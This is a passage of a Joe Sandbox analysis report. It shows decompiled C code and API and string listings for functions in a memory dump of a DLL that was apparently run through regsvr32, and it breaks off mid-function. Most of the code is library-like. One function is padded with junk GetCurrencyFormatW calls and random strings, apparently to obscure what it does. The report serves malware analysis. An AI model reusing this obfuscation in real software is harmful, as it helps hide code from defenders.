Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MenuMessageSend$Append$System
String ID: Hola$Hola Mundo
API String ID: 1041970973-3638179569
Opcode ID: e34ef31d9de0c10b9e087c5bcc9f0d31551c493d279669179a5a011054600792
Instruction ID: b3705290631e1be327c95a3509f9ae24e9e58cb89a542e4eda3f4c22a02a2666
Opcode Fuzzy Hash: e34ef31d9de0c10b9e087c5bcc9f0d31551c493d279669179a5a011054600792
Instruction Fuzzy Hash: 4521E571600744BFE711DB20CC82F6BB7A9FB49B90F004A29F255A61E1DB36BD04CB65

Uniqueness

Uniqueness Score: -1.00%

Function 10012309 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E10012309(intOrPtr __ecx, signed int _a4) {
				signed int _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				void* _t14;
				char* _t23;
				void* _t29;
				signed short _t30;
				struct HDC__* _t31;
				signed int _t32;

				_t12 =  *0x10045580; // 0x771f5646
				_v8 = _t12 ^ _t32;
				_t31 = GetStockObject;
				_t30 = 0xa;
				_v72 = __ecx;
				_t23 = "System";
				_t14 = GetStockObject(0x11);
				if(_t14 != 0) {
					L2:
					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
						_t23 =  &_v40;
						_t31 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
						ReleaseDC(0, _t31);
					}
					L6:
					_t16 = _a4;
					if(_a4 == 0) {
						_t16 = _t30 & 0x0000ffff;
					}
					return E1001FBB5(E100121BA(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
				}
				_t14 = GetStockObject(0xd);
				if(_t14 == 0) {
					goto L6;
				}
				goto L2;
			}

APIs

GetStockObject.GDI32(00000011), ref: 1001232F
GetStockObject.GDI32(0000000D), ref: 10012337
GetObjectA.GDI32(00000000,0000003C,?), ref: 10012344
GetDC.USER32(00000000), ref: 10012353
GetDeviceCaps.GDI32(00000000,0000005A), ref: 10012367
MulDiv.KERNEL32(00000000,00000048,00000000), ref: 10012373
ReleaseDC.USER32 ref: 1001237F

Strings

System, xrefs: 1001232A, 10012394

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: f7306e7935f5abbcbdc9fefcc9670ce0ed1cf25eefe840699117e3069a8def3f
Instruction ID: 49ddb338abe5c97598327bd9655a3bb67b407c313b2becf61478e8986669c503
Opcode Fuzzy Hash: f7306e7935f5abbcbdc9fefcc9670ce0ed1cf25eefe840699117e3069a8def3f
Instruction Fuzzy Hash: 9B1182B1600328AFEB14DBA0CC89FAE77B8EB49781F014015F601EE1D1DB749E418B60

Uniqueness

Uniqueness Score: -1.00%

Function 1001D204 Relevance: 13.8, APIs: 9, Instructions: 253
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E1001D204(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				CHAR* _t121;
				int _t122;
				CHAR* _t127;
				CHAR* _t135;
				CHAR* _t140;
				signed short* _t142;
				CHAR* _t144;
				CHAR* _t148;
				CHAR* _t151;
				signed int _t158;
				signed int _t169;
				CHAR* _t173;
				void* _t176;
				void* _t179;
				signed short _t181;
				signed int _t183;
				intOrPtr _t185;
				CHAR* _t188;
				int _t190;
				char* _t193;
				void* _t194;
				void* _t195;
				CHAR* _t196;
				char* _t198;
				void* _t199;
				long long _t204;

				_t199 = __eflags;
				_t185 = __edx;
				_push(0x50);
				E1001FC63(E100348FF, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t195 - 0x34)) = __ecx;
				E1000EC55(_t195 - 0x30, _t199,  *((intOrPtr*)(__ecx + 0x1c)));
				_t173 =  *(_t195 + 8);
				_t121 = _t173[8];
				_t187 = 0;
				 *(_t195 - 4) = 0;
				 *(_t195 - 0x1d) = 0;
				 *(_t195 - 0x18) = _t121;
				if(_t121 == 0) {
					 *(_t195 - 0x18) = _t195 - 0x1d;
				}
				_t122 = lstrlenA( *(_t195 - 0x18));
				_t201 =  *(_t195 + 0xc) & 0x0000000c;
				_t190 = _t122;
				 *(_t195 - 0x28) = _t173[0x10];
				 *(_t195 - 0x24) = _t173[0xc] & 0x0000ffff;
				if(( *(_t195 + 0xc) & 0x0000000c) == 0) {
					L11:
					_t191 =  *(_t195 + 0x14);
					_push( *(_t191 + 8) << 4);
					_t127 = E100010EE(_t173, _t185, _t187, _t191, __eflags);
					__eflags = _t127;
					_pop(_t176);
					if(_t127 != 0) {
						_t191 =  *(_t191 + 8);
						__eflags = _t191 - 0x7ffffff;
						if(_t191 > 0x7ffffff) {
							goto L12;
						}
						_t192 = _t191 << 4;
						E100203C0(_t191 << 4);
						 *(_t195 - 0x10) = _t196;
						 *(_t195 - 0x1c) = _t196;
						E10020F40(_t187,  *(_t195 - 0x1c), _t187, _t191 << 4);
						_t198 =  &(_t196[0xc]);
						_t187 = E1001C9FD(_t176, _t187, _t192,  *(_t195 - 0x18),  *(_t195 - 0x24));
						_t49 = _t187 + 0x10; // 0x10
						_t191 = _t49;
						_push(_t49);
						_t135 = E100010EE(_t173, _t185, _t187, _t49, __eflags);
						__eflags = _t135;
						if(_t135 == 0) {
							L4:
							 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
							if( *(_t195 - 0x2c) == 0) {
								L7:
								L55:
								return E1001FCBF(_t173, _t187, _t191);
							}
							_push( *((intOrPtr*)(_t195 - 0x30)));
							_push(0);
							L6:
							E1000E519();
							goto L7;
						}
						E100203C0(_t191);
						 *(_t195 - 0x10) = _t198;
						_t173 = 0;
						_t193 = _t198;
						 *((intOrPtr*)(_t195 - 0x58)) = 0x10038ec0;
						 *((intOrPtr*)(_t195 - 0x54)) = 0;
						 *((intOrPtr*)(_t195 - 0x48)) = 0;
						 *((intOrPtr*)(_t195 - 0x4c)) = 0;
						 *((intOrPtr*)(_t195 - 0x50)) = 0;
						_push(_t195 - 0x58);
						_push( *(_t195 - 0x1c));
						_push( *((intOrPtr*)(_t195 + 0x18)));
						 *(_t195 - 4) = 1;
						_push( *(_t195 + 0x14));
						_push( *(_t195 - 0x24));
						_push(_t195 - 0x44);
						_push( *(_t195 - 0x18));
						_push(_t193);
						_t140 = E1001CF1C(0,  *((intOrPtr*)(_t195 - 0x34)), _t187, _t193, __eflags);
						__eflags = _t140;
						 *(_t195 - 0x18) = _t140;
						if(_t140 != 0) {
							L26:
							_t191 =  *(_t195 + 0x14);
							_t187 = 0;
							__eflags =  *(_t191 + 8);
							if( *(_t191 + 8) <= 0) {
								L29:
								__eflags =  *(_t195 - 0x18);
								_t179 = _t195 - 0x58;
								if( *(_t195 - 0x18) == 0) {
									E1001CDAE(_t179);
									_t142 =  *(_t195 + 0x10);
									__eflags = _t142;
									if(_t142 == 0) {
										_t144 = ( *(_t195 - 0x24) & 0x0000ffff) - 8;
										__eflags = _t144;
										if(_t144 == 0) {
											__imp__#6(_t173);
											L52:
											 *(_t195 - 4) = 0;
											E1001CE04(_t195 - 0x58);
											 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
											__eflags =  *(_t195 - 0x2c);
											if( *(_t195 - 0x2c) != 0) {
												_push( *((intOrPtr*)(_t195 - 0x30)));
												_push(0);
												E1000E519();
											}
											__eflags = 0;
											goto L55;
										}
										_t148 = _t144 - 1;
										__eflags = _t148;
										if(_t148 == 0) {
											L48:
											__eflags = _t173;
											if(_t173 != 0) {
												 *((intOrPtr*)( *_t173 + 8))(_t173);
											}
											goto L52;
										}
										_t151 = _t148 - 3;
										__eflags = _t151;
										if(_t151 == 0) {
											__imp__#9(_t195 - 0x44);
											goto L52;
										}
										__eflags = _t151 != 1;
										if(_t151 != 1) {
											goto L52;
										}
										goto L48;
									}
									_t181 =  *(_t195 - 0x24);
									 *_t142 = _t181;
									_t183 = (_t181 & 0x0000ffff) + 0xfffffffe;
									__eflags = _t183 - 0x13;
									if(_t183 > 0x13) {
										goto L52;
									}
									switch( *((intOrPtr*)(_t183 * 4 +  &M1001D514))) {
										case 0:
											L41:
											 *(__eax + 8) = __bx;
											goto L52;
										case 1:
											 *(__eax + 8) = __ebx;
											goto L52;
										case 2:
											 *(__eax + 8) =  *(__ebp - 0x44);
											goto L52;
										case 3:
											 *(__eax + 8) =  *(__ebp - 0x44);
											goto L52;
										case 4:
											__ecx =  *(__ebp - 0x44);
											 *(__eax + 8) =  *(__ebp - 0x44);
											__ecx =  *(__ebp - 0x40);
											 *(__eax + 0xc) = __ecx;
											goto L52;
										case 5:
											__bx =  ~__bx;
											asm("sbb ebx, ebx");
											goto L41;
										case 6:
											__esi = __ebp - 0x44;
											__edi = __eax;
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsd");
											goto L52;
										case 7:
											goto L52;
										case 8:
											_t142[4] = _t173;
											goto L52;
									}
								}
								 *(_t195 - 4) = 0;
								E1001CE04(_t179);
								 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
								__eflags =  *(_t195 - 0x2c);
								if( *(_t195 - 0x2c) != 0) {
									_push( *((intOrPtr*)(_t195 - 0x30)));
									_push(0);
									E1000E519();
								}
								goto L55;
							}
							do {
								__imp__#9( *(_t195 - 0x1c));
								 *(_t195 - 0x1c) =  &(( *(_t195 - 0x1c))[0x10]);
								_t187 = _t187 + 1;
								__eflags = _t187 -  *(_t191 + 8);
							} while (_t187 <  *(_t191 + 8));
							goto L29;
						}
						_t158 =  *(_t195 - 0x24) & 0x0000ffff;
						__eflags = _t158 - 4;
						_push(_t187);
						_push(_t193);
						_push( *(_t195 - 0x28));
						 *(_t195 - 4) = 2;
						if(_t158 == 4) {
							E1001E78B();
							 *((intOrPtr*)(_t195 - 0x34)) = _t204;
							 *((intOrPtr*)(_t195 - 0x44)) =  *((intOrPtr*)(_t195 - 0x34));
							L25:
							 *(_t195 - 4) = 1;
							goto L26;
						}
						__eflags = _t158 - 5;
						if(_t158 == 5) {
							L23:
							E1001E78B();
							 *((long long*)(_t195 - 0x44)) = _t204;
							goto L25;
						}
						__eflags = _t158 - 7;
						if(_t158 == 7) {
							goto L23;
						}
						__eflags = _t158 + 0xffffffec - 1;
						if(_t158 + 0xffffffec > 1) {
							_t173 = E1001E78B();
						} else {
							 *((intOrPtr*)(_t195 - 0x44)) = E1001E78B();
							 *((intOrPtr*)(_t195 - 0x40)) = _t185;
						}
						goto L25;
					}
					L12:
					 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
					__eflags =  *(_t195 - 0x2c) - _t187;
					if( *(_t195 - 0x2c) == _t187) {
						goto L7;
					}
					_push( *((intOrPtr*)(_t195 - 0x30)));
					_push(_t187);
					goto L6;
				}
				_t19 = _t190 + 3; // 0x3
				_t187 = _t19;
				_push(_t19);
				if(E100010EE(_t173, _t185, _t19, _t190, _t201) != 0) {
					E100203C0(_t187);
					 *(_t195 - 0x10) = _t196;
					_t188 = _t196;
					_t26 = _t190 + 3; // 0x3
					E10005007(_t188, _t190, _t195, _t188, _t26,  *(_t195 - 0x18), _t190);
					_t169 = _t173[0xc] & 0x0000ffff;
					_t196 =  &(_t196[0x10]);
					__eflags = _t169 - 8;
					 *(_t195 - 0x18) = _t188;
					if(_t169 == 8) {
						_t169 = 0xe;
					}
					 *(_t195 - 0x24) =  *(_t195 - 0x24) & 0x00000000;
					_t188[_t190] = 0xff;
					_t194 = _t190 + 1;
					_t188[_t194] = _t169;
					_t188[_t194 + 1] = 0;
					 *(_t195 - 0x28) = _t173[0x14];
					_t187 = 0;
					__eflags = 0;
					goto L11;
				}
				goto L4;
			}

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 1001D20B
lstrlenA.KERNEL32(00000000,000000FF,00000050,10012995,00000000,00000001,?,?,000000FF,?,?,?), ref: 1001D23D
__alloca_probe_16.LIBCMT ref: 1001D286

Part of subcall function 10005007: _memcpy_s.LIBCMT ref: 10005017

__alloca_probe_16.LIBCMT ref: 1001D2FD
_memset.LIBCMT ref: 1001D30D
__alloca_probe_16.LIBCMT ref: 1001D336
VariantClear.OLEAUT32(?), ref: 1001D3EC

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: __alloca_probe_16$ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
String ID:
API String ID: 2586305615-0
Opcode ID: 7d36ba39bd72652906d95b9a6764dc008f6fb844193c5fed64fe356d7127ab0a
Instruction ID: 6804580c6d9db2e853958beb5b9c70fac7fcc155cdbb3eab0184ec39f158d97d
Opcode Fuzzy Hash: 7d36ba39bd72652906d95b9a6764dc008f6fb844193c5fed64fe356d7127ab0a
Instruction Fuzzy Hash: 2EA1AE35C00649DBDF11EFE4C885AAEBBB1FF04354F20415AE825AB291D774EE81DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10010915 Relevance: 13.6, APIs: 9, Instructions: 96
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E10010915(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				void* _t39;
				long _t41;
				void* _t42;
				long _t47;
				void* _t53;
				signed int _t55;
				long* _t62;
				struct _CRITICAL_SECTION* _t64;
				void* _t65;
				void* _t66;

				_push(0x10);
				E1001FBF7(E10033B54, __ebx, __edi, __esi);
				_t62 = __ecx;
				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
				_t64 = __ecx + 0x1c;
				 *(_t66 - 0x14) = _t64;
				EnterCriticalSection(_t64);
				_t36 =  *(_t66 + 8);
				if(_t36 <= 0 || _t36 >= _t62[3]) {
					LeaveCriticalSection(_t64);
				} else {
					_t65 = TlsGetValue( *_t62);
					if(_t65 == 0) {
						 *(_t66 - 4) = 0;
						_t39 = E100105C8(0x10);
						__eflags = _t39;
						if(__eflags == 0) {
							_t65 = 0;
							__eflags = 0;
						} else {
							 *_t39 = 0x100384d0;
							_t65 = _t39;
						}
						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
						_t51 =  &(_t62[5]);
						 *(_t65 + 8) = 0;
						 *(_t65 + 0xc) = 0;
						E100106E4( &(_t62[5]), _t65);
						goto L5;
					} else {
						_t55 =  *(_t66 + 8);
						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
							L5:
							_t75 =  *(_t65 + 0xc);
							if( *(_t65 + 0xc) != 0) {
								_t41 = E100010C9(_t51, __eflags, _t62[3], 4);
								_t53 = 2;
								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
							} else {
								_t47 = E100010C9(_t51, _t75, _t62[3], 4);
								_pop(_t53);
								_t42 = LocalAlloc(0, _t47);
							}
							_t76 = _t42;
							if(_t42 == 0) {
								LeaveCriticalSection( *(_t66 - 0x14));
								_t42 = E10004E3A(0, _t53, _t62, _t65, _t76);
							}
							 *(_t65 + 0xc) = _t42;
							E10020F40(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
							 *(_t65 + 8) = _t62[3];
							TlsSetValue( *_t62, _t65);
							_t55 =  *(_t66 + 8);
						}
					}
					_t36 =  *(_t65 + 0xc);
					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
					}
					LeaveCriticalSection( *(_t66 - 0x14));
				}
				return E1001FC9C(_t36);
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 1001091C
EnterCriticalSection.KERNEL32(?,00000010,10010ACA,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD), ref: 1001092D
TlsGetValue.KERNEL32(?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD,00000000), ref: 1001094B
LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 1001097F
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD,00000000), ref: 100109EB
_memset.LIBCMT ref: 10010A0A
TlsSetValue.KERNEL32(?,00000000,00000058,10003840), ref: 10010A1B
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD,00000000), ref: 10010A3C

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
String ID:
API String ID: 1891723912-0
Opcode ID: ce974ed0f0f987bdcecbe95e2976648c49878f8f168887bcc8d6339403368800
Instruction ID: c7db6ee6c4a6de8547c75bf432caa67de510ee99b88e2ce085b1988c099b2997
Opcode Fuzzy Hash: ce974ed0f0f987bdcecbe95e2976648c49878f8f168887bcc8d6339403368800
Instruction Fuzzy Hash: 5431BC70600606AFE721DF10CC95C5ABBB5FF04350B61C52AF9869F562CBB1ED90CB91

Uniqueness

Uniqueness Score: -1.00%

Function 10001395 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 104
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10001395(signed short* _a4, signed short* _a8) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				void* _t31;
				void* _t34;
				signed int _t36;
				short* _t56;
				short* _t76;

				_t31 = E10001380(_a4);
				if(_t31 == E10001380(_a8)) {
					_v4 = _v4 & 0x00000000;
					if(E10001380(_a4) <= 0) {
						L12:
						_t34 = 0;
						L13:
						return _t34;
					}
					_t76 = L"xadqsavcbdfewescGADW";
					_t56 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
					while(1) {
						_t36 =  *_a4 & 0x0000ffff;
						_v8 = _t36;
						_v12 =  *_a8 & 0x0000ffff;
						if(_t36 >= 0x41 && (_v8 & 0x0000ffff) <= GetCurrencyFormatW(0, 0x11d4, _t56, 0, _t76, 0x22b9) *  *0x100440dc + 0x5a) {
							_v8 = _v8 + GetCurrencyFormatW(0, 0x11d4, _t56, 0, _t76, 0x22b9) *  *0x100440d0 + 0x20;
						}
						if(_v12 >= 0x41 && (_v12 & 0x0000ffff) <= GetCurrencyFormatW(0, 0x11d4, _t56, 0, _t76, 0x22b9) *  *0x100440d0 + 0x5a) {
							_t19 = GetCurrencyFormatW(0, 0x11d4, _t56, 0, _t76, 0x22b9) *  *0x100440d0 + 0x20; // 0x61
							_v12 = _v12 + _t19;
						}
						if(_v8 != _v12) {
							break;
						}
						_a4 =  &(_a4[1]);
						_v4 = _v4 + 1;
						_a8 =  &(_a8[1]);
						if(_v4 < E10001380(_a4)) {
							continue;
						}
						goto L12;
					}
					_t34 = 1;
					goto L13;
				}
				return 1;
			}

APIs

GetCurrencyFormatW.KERNEL32 ref: 10001412
GetCurrencyFormatW.KERNEL32 ref: 10001433
GetCurrencyFormatW.KERNEL32 ref: 1000145C
GetCurrencyFormatW.KERNEL32 ref: 1000147D

Strings

xadqsavcbdfewescGADW, xrefs: 100013DB, 1000140B, 1000142C, 10001455, 10001476
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 100013E0, 1000140E, 1000142F, 10001458, 10001479
A, xrefs: 10001448

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrencyFormat
String ID: A$eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-1548561649
Opcode ID: ff66f9b222791484f9004abab8941d8b3f5860db612cf30440ee761440cc1f47
Instruction ID: 41e55657c6f233ddb2d2aa4512fb1aa83921a4b3024967986a1fac65e9f116a1
Opcode Fuzzy Hash: ff66f9b222791484f9004abab8941d8b3f5860db612cf30440ee761440cc1f47
Instruction Fuzzy Hash: 8B31E434608346AFE704DF51DC81F6BBBE8FB85789F10481EFA84961D0E7B49948CB62

Uniqueness

Uniqueness Score: -1.00%

Function 10016311 Relevance: 12.3, APIs: 8, Instructions: 297
memoryCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E10016311(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t114;
				intOrPtr _t118;
				intOrPtr* _t119;
				void* _t120;
				intOrPtr* _t121;
				void* _t122;
				intOrPtr* _t125;
				intOrPtr* _t127;
				void _t129;
				intOrPtr* _t131;
				long _t134;
				void* _t135;
				void* _t136;
				void* _t137;
				void _t139;
				void _t141;
				void* _t143;
				void* _t144;
				void* _t147;
				void* _t148;
				void _t149;
				void* _t151;
				intOrPtr* _t153;
				void* _t154;
				void _t158;
				void* _t159;
				void _t161;
				intOrPtr* _t163;
				void* _t168;
				intOrPtr* _t170;
				intOrPtr* _t172;
				intOrPtr* _t174;
				void* _t175;
				intOrPtr _t186;
				intOrPtr* _t206;
				void* _t210;
				intOrPtr* _t219;
				intOrPtr* _t221;
				void* _t222;
				void* _t224;

				_push(0x68);
				_t114 = E1001FBC4(E100340BB, __ebx, __edi, __esi);
				_t221 = __ecx;
				 *((intOrPtr*)(_t224 - 0x24)) = __ecx;
				_t219 = __ecx + 0x50;
				 *(_t224 - 0x10) = 0;
				if( *_t219 != 0) {
					L2:
					 *(_t224 + 8) = 0;
					 *(_t224 - 0x14) = 0;
					 *((intOrPtr*)(_t224 + 0x14)) = 0;
					E10014BD2(_t221, _t221 + 0x40);
					_t118 =  *((intOrPtr*)( *_t221 + 0xc0))();
					 *((intOrPtr*)(_t224 - 0x20)) = _t118;
					if(_t118 != 0) {
						L5:
						_t222 =  *(_t224 + 0xc);
						if(_t222 == 0) {
							__eflags =  *(_t224 + 0x10);
							if( *(_t224 + 0x10) != 0) {
								L16:
								_t119 =  *_t219;
								_t210 = _t224 - 0x14;
								_t120 =  *((intOrPtr*)( *_t119))(_t119, 0x1003b26c, _t210);
								__eflags = _t120;
								if(_t120 < 0) {
									L43:
									if( *(_t224 - 0x10) >= 0) {
										L46:
										_t121 =  *((intOrPtr*)(_t224 + 0x14));
										if(_t121 != 0) {
											 *((intOrPtr*)( *_t121 + 8))(_t121);
										}
										if( *((intOrPtr*)(_t224 - 0x20)) != 0 &&  *(_t224 - 0x10) >= 0) {
											 *(_t224 - 0x10) = 1;
										}
										_t122 =  *(_t224 - 0x10);
										L52:
										return E1001FC9C(_t122);
									}
									L44:
									_t125 =  *_t219;
									if(_t125 != 0) {
										 *((intOrPtr*)( *_t125 + 0x18))(_t125, 1);
										_t127 =  *_t219;
										 *((intOrPtr*)( *_t127 + 8))(_t127);
										 *_t219 = 0;
									}
									goto L46;
								}
								__eflags = _t222;
								if(_t222 != 0) {
									__eflags =  *(_t224 + 0x10);
									if( *(_t224 + 0x10) == 0) {
										 *(_t224 - 0x10) = 0x8000ffff;
										L37:
										_t129 =  *(_t224 - 0x14);
										L38:
										 *((intOrPtr*)( *_t129 + 8))(_t129);
										L39:
										if( *(_t224 - 0x10) < 0) {
											goto L44;
										}
										if( *((intOrPtr*)(_t224 - 0x20)) == 0) {
											_t186 =  *((intOrPtr*)(_t224 - 0x24));
											if(( *(_t186 + 0x70) & 0x00020000) == 0) {
												_t131 =  *_t219;
												 *(_t224 - 0x10) =  *((intOrPtr*)( *_t131 + 0xc))(_t131, _t186 + 0xc8);
											}
										}
										goto L43;
									}
									_t134 =  *((intOrPtr*)( *_t222 + 0x30))();
									__eflags = _t210;
									 *(_t224 - 0x2c) = _t134;
									if(__eflags > 0) {
										L29:
										 *(_t224 - 0x10) = 0x8007000e;
										 *(_t224 + 0x10) = 0;
										L30:
										__eflags =  *(_t224 + 0x10);
										 *(_t224 - 0x1c) = 0;
										if( *(_t224 + 0x10) == 0) {
											goto L37;
										}
										_t135 = _t224 - 0x1c;
										__imp__CreateILockBytesOnHGlobal( *(_t224 + 0x10), 1, _t135);
										__eflags = _t135;
										 *(_t224 - 0x10) = _t135;
										if(_t135 < 0) {
											goto L37;
										}
										_t136 = _t224 - 0x18;
										 *(_t224 - 0x18) = 0;
										__imp__StgOpenStorageOnILockBytes( *(_t224 - 0x1c), 0, 0x12, 0, 0, _t136);
										__eflags = _t136;
